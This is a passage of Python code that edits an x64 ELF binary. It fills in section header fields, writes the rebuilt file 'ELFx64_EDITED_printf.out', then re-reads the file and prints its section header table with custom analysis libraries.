section.size = LibDebug.AdaptStringToHex(
hex(int(len(rawdata) / 2))[2:], 4 * 2)
elif Elf.Elfheader.struct == "02":
section.flags = "0000000000000004"
section.addr = "0000000000000000"
section.size = LibDebug.AdaptStringToHex(
hex(int(len(rawdata) / 2))[2:], 8 * 2)
section.link = "00000000"
section.info = "00000000"
section.addralign = "0000000000000001"
section.entsize = "0000000000000000"
content += Elf.Elfheader.ToHex()
content += Elf.Programheadertable.ToHex()
content += Elf.Dummy.ToHex()
content += Elf.Sectionheadertable.sectiontable[
int(Elf.Elfheader.entrynumber_sectionheader, 16) - 4].ToHex()
content += Elf.Sectionheadertable.ToHex()
LibByteEditor.CreateBinFromHex("ELFx64_EDITED_printf.out", content)
Elf.PrintSectionHeaderTable()
HexContent = LibByteEditor.GetHexFromFile("ELFx64_EDITED_printf.out")
ElfInput = LibElfAnnalyzer.Extract(HexContent)
ElfInput.PrintSectionHeaderTable()
exit()